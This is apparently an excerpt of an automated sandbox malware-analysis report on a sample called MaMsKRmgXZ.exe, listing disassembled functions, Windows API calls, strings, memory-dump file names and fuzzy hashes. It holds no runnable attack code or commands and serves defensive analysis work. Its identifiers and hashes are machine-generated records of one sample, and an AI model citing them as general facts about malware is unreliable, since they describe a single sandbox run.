
Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction ID: 7ab3ce879d7da258620b5dd87dc6aa02706b67d8cc8a7f981bd8ed1ee31a9d30
Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction Fuzzy Hash: 46E046F0A00209BFEB009B60EC09F7B7AACEB10748F404861BD11F32A0E374A9108A79

Uniqueness

Uniqueness Score: -1.00%

Function 00403762 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,751D3410,00000000,C:\Users\user\AppData\Local\Temp\,0040373A,00403554,?,?,00000006,00000008,0000000A), ref: 0040377C
GlobalFree.KERNEL32(0067A1D0), ref: 00403783

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403762

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: c8d1562c69e49bacb52193c1b129ec66577e910d0a26dd744afe86c7ae1d1dec
Instruction ID: ee514f1fc3f324b596d41214b75e1b85a5e4a54197580a2dff82031d974a72f0
Opcode Fuzzy Hash: c8d1562c69e49bacb52193c1b129ec66577e910d0a26dd744afe86c7ae1d1dec
Instruction Fuzzy Hash: 40E0C27380112097C7251F07EC04B5A776CAF45B22F01C02AEC007B3A0C7742C418BD9

Uniqueness

Uniqueness Score: -1.00%

Function 004059B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MaMsKRmgXZ.exe,C:\Users\user\Desktop\MaMsKRmgXZ.exe,80000000,00000003), ref: 004059BF
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MaMsKRmgXZ.exe,C:\Users\user\Desktop\MaMsKRmgXZ.exe,80000000,00000003), ref: 004059CD

Strings

C:\Users\user\Desktop, xrefs: 004059B9

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 1c4ce1fe46e37373cead662465a4f3eb2a6c0bdf31f922d28b251b51ad992424
Instruction ID: a086819795abd80aa1ad59fb022c9920fa60cb9da26d6d2253466900a8022463
Opcode Fuzzy Hash: 1c4ce1fe46e37373cead662465a4f3eb2a6c0bdf31f922d28b251b51ad992424
Instruction Fuzzy Hash: 3FD0A7E3408DB05EE70353149C04B9F6A48CF12310F0900A3F180A21A6C67C1C414BFE

Uniqueness

Uniqueness Score: -1.00%

Function 6EC010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6EC0115B
GlobalFree.KERNEL32(00000000), ref: 6EC011B4
GlobalFree.KERNEL32(?), ref: 6EC011C7
GlobalFree.KERNEL32(?), ref: 6EC011F5

Memory Dump Source

Source File: 00000000.00000002.9908323213.000000006EC01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EC00000, based on PE: true

Associated: 00000000.00000002.9908269121.000000006EC00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.9908365679.000000006EC03000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.9908406672.000000006EC05000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec00000_MaMsKRmgXZ.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 1f20c9794e038696ebe5793e36f564965205845910a23a52df161120f064e5bc
Instruction ID: d26fce7a722c809bb2ffd46bb309d28669c90af26073492dee5f8e0e0537978a
Opcode Fuzzy Hash: 1f20c9794e038696ebe5793e36f564965205845910a23a52df161120f064e5bc
Instruction Fuzzy Hash: EB31B0B1408645AFEB058FEDDA98A66BFFDFB0624CB050419F964D6214E7378E09CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00405AD8 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE8
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B00
CharNextA.USER32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11
lstrlenA.KERNEL32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B1A

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: c17fcd1cf7dd52c707961598001fbe9307a221727c523cbd792ccb3aa3d95fe1
Instruction ID: 2cbfd0870324320007afb9b70b5ca04d8eb3af27e3ea935175830c0dc6d3898b
Opcode Fuzzy Hash: c17fcd1cf7dd52c707961598001fbe9307a221727c523cbd792ccb3aa3d95fe1
Instruction Fuzzy Hash: 50F0C231604414BFC702DBA9DC40D9EBBB8EF46250B2540A6E800F7251D274FE01ABA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MaMsKRmgXZ.exePID: 6720, Parent PID: 4828COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	1
Total number of Limit Nodes:	0

Executed Functions

Function 34222C30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34222C3A

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f81cd86ce35c8aca916a03d5d90b262aa2dd5c54d6ccd46185b2d3ae125f0d2d
Instruction ID: f0cd44871970068fc4b327a027b225ad7a8ff39c3e0dc5a1c8613498ef77b022
Opcode Fuzzy Hash: f81cd86ce35c8aca916a03d5d90b262aa2dd5c54d6ccd46185b2d3ae125f0d2d
Instruction Fuzzy Hash: 2E90026921300402D5807158550860A009647D1246F91D81AA4007918CC925C86D6321

Uniqueness

Uniqueness Score: -1.00%

Function 34222C50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34222C5A

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 21257d2e00e4e76c2e3a2a8a7ba312935bef5f6221b2aec948b6787a8b2a4b84
Instruction ID: 178d843569fc029430fa7cf53525cac3d78381bd0f4098e02c37d9d0d93a7bb0
Opcode Fuzzy Hash: 21257d2e00e4e76c2e3a2a8a7ba312935bef5f6221b2aec948b6787a8b2a4b84
Instruction Fuzzy Hash: AF90026130200403D54071585518606409697E1345F51D416E4406914CD925C85A6222

Uniqueness

Uniqueness Score: -1.00%

Function 34222CF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34222CFA

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bdd3bb986de49ae35a7d71fcb165da5f47241d392f5c6ba6fc107b161785107e
Instruction ID: 61278306f2be60f212da63de7b49118ca56f5755a4dad4d99769a798a92caed0
Opcode Fuzzy Hash: bdd3bb986de49ae35a7d71fcb165da5f47241d392f5c6ba6fc107b161785107e
Instruction Fuzzy Hash: 79900261243045525945B1584504507409757E0285791C417A5406D10CC536D85AE621

Uniqueness

Uniqueness Score: -1.00%

Function 34222D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34222D1A

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5cf81c87e6ac68fd335941689ab96d95bd03c27f49a118b173b3e1d53239c6a4
Instruction ID: 68ece3b1da3a6cf4c9ad80dc63d06df6a2b75a722e284a6930f92591f0e357ee
Opcode Fuzzy Hash: 5cf81c87e6ac68fd335941689ab96d95bd03c27f49a118b173b3e1d53239c6a4
Instruction Fuzzy Hash: BC90027120200813D51161584604707009A47D0285F91C817A4416918DD666C956B121

Uniqueness

Uniqueness Score: -1.00%

Function 34222DA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34222DAA

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7501337093c3b21663d961e92a68e523b3664e00b1fce6fb7f276467d37217e1
Instruction ID: a6263a3f8aa91b634d0e3414906b88927eab9c83071d8882d312883bd1a7a824
Opcode Fuzzy Hash: 7501337093c3b21663d961e92a68e523b3664e00b1fce6fb7f276467d37217e1
Instruction Fuzzy Hash: E590026160200902D50171584504616009B47D0285F91C427A5016915ECA35C996B131

Uniqueness

Uniqueness Score: -1.00%

Function 34222DC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34222DCA

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8487f019f990c0670e68b0ae4ada4a29d37a35ca3b583222838c889b1e78e0b6
Instruction ID: b6fd505f5501f54ef904927f9792c3973406b52d9079dd7ef40814bb58b5271d
Opcode Fuzzy Hash: 8487f019f990c0670e68b0ae4ada4a29d37a35ca3b583222838c889b1e78e0b6
Instruction Fuzzy Hash: B39002B120200802D54071584504746009647D0345F51C416A9056914EC669CDD97665

Uniqueness

Uniqueness Score: -1.00%

Function 34222E50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34222E5A

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e4e543d8a90453afeb0811a02fd93a78e3c1fd28b9a4e82e2982635b6d722e89
Instruction ID: 2c0150d750098f9924d49359d4eeb972c9f81bf7fe3931bd66352aefecbd2619
Opcode Fuzzy Hash: e4e543d8a90453afeb0811a02fd93a78e3c1fd28b9a4e82e2982635b6d722e89
Instruction Fuzzy Hash: 749002A134200842D50061584514B06009687E1345F51C41AE5056914DC629CC567126

Uniqueness

Uniqueness Score: -1.00%

Function 34222EB0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34222EBA

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 06d289e466b56222bd3b1ea429c26be681d2a054f347f4f13118d9af4b8155b6
Instruction ID: a7fdcc7902f904d1b4100360c6fa2c6413d716f509ea2b944e352daf31910ef6
Opcode Fuzzy Hash: 06d289e466b56222bd3b1ea429c26be681d2a054f347f4f13118d9af4b8155b6
Instruction Fuzzy Hash: 0A90027120240802D5006158491470B009647D0346F51C416A5156915DC635C8557571

Uniqueness

Uniqueness Score: -1.00%

Function 34222ED0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34222EDA

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f86984b5ea55235f0f9f020ea099dfb6b8cde699cae2dc264f20035a903bbf1
Instruction ID: 24a7946dc79390e4d99c70349e166160f3d3b2a675e893a4400f2e013b325d6c
Opcode Fuzzy Hash: 8f86984b5ea55235f0f9f020ea099dfb6b8cde699cae2dc264f20035a903bbf1
Instruction Fuzzy Hash: F59002616020044245407168894490640966BE1255751C526A498A910DC569C8696665

Uniqueness

Uniqueness Score: -1.00%

Function 34222F00 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34222F0A

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36ff5e8a4bccbd14091cd10d71ef6861aa4d4866d6332ab914dcffbb355a7664
Instruction ID: 6474593acba5253b6c4086711953befa5ffa550eaf9c69ceeacdd6ef14302a2a
Opcode Fuzzy Hash: 36ff5e8a4bccbd14091cd10d71ef6861aa4d4866d6332ab914dcffbb355a7664
Instruction Fuzzy Hash: 0E90026121280442D60065684D14B07009647D0347F51C51AA4146914CC925C8656521

Uniqueness

Uniqueness Score: -1.00%

Function 342229F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 342229FA

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 673eab4c422bc7e1386546efb3725ff2f2492fa833964ea214c668b0e82cf3f9
Instruction ID: eb7fa8fed5e923740f1659a5f802525af71ac6ad46d6b0831640d28cff48121f
Opcode Fuzzy Hash: 673eab4c422bc7e1386546efb3725ff2f2492fa833964ea214c668b0e82cf3f9
Instruction Fuzzy Hash: 10900475313004030505F55C070450700D747D53D5351C437F5007D10CD731CC757131

Uniqueness

Uniqueness Score: -1.00%

Function 34222A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34222A8A

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a9f510d5e7e8151c1303fc73f160f151dfab64359d876310b70e854d7b44893a
Instruction ID: e707845a08f5e6321d7b5ee274a018d7c71f73c09f08b7e554b4350be48f4223
Opcode Fuzzy Hash: a9f510d5e7e8151c1303fc73f160f151dfab64359d876310b70e854d7b44893a
Instruction Fuzzy Hash: 949002A120300403450571584514616409B47E0245B51C426E5006950DC535C8957125

Uniqueness

Uniqueness Score: -1.00%

Function 34222B10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34222B1A

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 64e792db477b3fd2bdaa9236e1fc2ce835a89ba7de6020373b9d7c057d44fb38
Instruction ID: 3b6656483a9c2f9a021f6c02486355c15efeee52f79024607837242f0f0778da
Opcode Fuzzy Hash: 64e792db477b3fd2bdaa9236e1fc2ce835a89ba7de6020373b9d7c057d44fb38
Instruction Fuzzy Hash: 6F90027120200C02D5807158450464A009647D1345F91C41AA4017A14DCA25CA5D77A1

Uniqueness

Uniqueness Score: -1.00%

Function 34222B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34222B9A

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ea03682837ff61f95f954cf3e5f3a0d06ce57c65db1272e1e828ae75b2082e0
Instruction ID: b1ed80d8eddd4ba0fa52961f3d2ff82f32cabb2e79fab365f6b9cec627701663
Opcode Fuzzy Hash: 2ea03682837ff61f95f954cf3e5f3a0d06ce57c65db1272e1e828ae75b2082e0
Instruction Fuzzy Hash: E090027120208C02D5106158850474A009647D0345F55C816A8416A18DC6A5C8957121

Uniqueness

Uniqueness Score: -1.00%

Function 34222BC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34222BCA

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1c948c7b59c52864c8e1458664777e37a90b3ecfdfb68aa2c3137ba67c4a037a
Instruction ID: 5ed38916a8801a822c743c8aa2b06e63faf65f981728b1cfd5c87f2ca375b30c
Opcode Fuzzy Hash: 1c948c7b59c52864c8e1458664777e37a90b3ecfdfb68aa2c3137ba67c4a037a
Instruction Fuzzy Hash: 5190027120200802D50065985508646009647E0345F51D416A9016915EC675C8957131

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 34289060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34289208
RtlDebugPrintTimes.NTDLL ref: 342892A7
RtlDebugPrintTimes.NTDLL ref: 34289387
RtlDebugPrintTimes.NTDLL ref: 34289465
RtlDebugPrintTimes.NTDLL ref: 3428956A
RtlDebugPrintTimes.NTDLL ref: 34289601
RtlDebugPrintTimes.NTDLL ref: 34289714
RtlDebugPrintTimes.NTDLL ref: 3428987C

Strings

, xrefs: 34289704
0, xrefs: 34289776
, xrefs: 34289657

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $ $0
API String ID: 3446177414-3352262554
Opcode ID: c0d7c2a1eef5c97e6b9d3211dc0e76a901c3f8639e2199d2797926cb7513ac18
Instruction ID: 4d2ca83278b93474828ad23ab60949b87cf42ac0e2fdf5baebb09615a145a060
Opcode Fuzzy Hash: c0d7c2a1eef5c97e6b9d3211dc0e76a901c3f8639e2199d2797926cb7513ac18
Instruction Fuzzy Hash: 3C3215B1A083828FE350CF69C884B5FBBE5BB88344F44492EF599A7290D775D948CF52

Uniqueness

Uniqueness Score: -1.00%

Function 34218540 Relevance: 19.0, Strings: 15, Instructions: 223COMMON

Download Yara Rule

Strings

First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 342552ED
8, xrefs: 342550EE
corrupted critical section, xrefs: 342552CD
I=w, xrefs: 3425514C, 34255158
double initialized or corrupted critical section, xrefs: 34255313
undeleted critical section in freed memory, xrefs: 34255236
Critical section debug info address, xrefs: 3425522A, 34255339
Critical section address, xrefs: 34255230, 342552C7, 3425533F
Critical section address., xrefs: 3425530D
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 34255215, 342552A1, 34255324
Address of the debug info found in the active list., xrefs: 342552B9, 34255305
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 342552D9
Thread identifier, xrefs: 34255345
Thread is in a state in which it cannot own a critical section, xrefs: 3425534E
Invalid debug info address of this critical section, xrefs: 342552C1

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
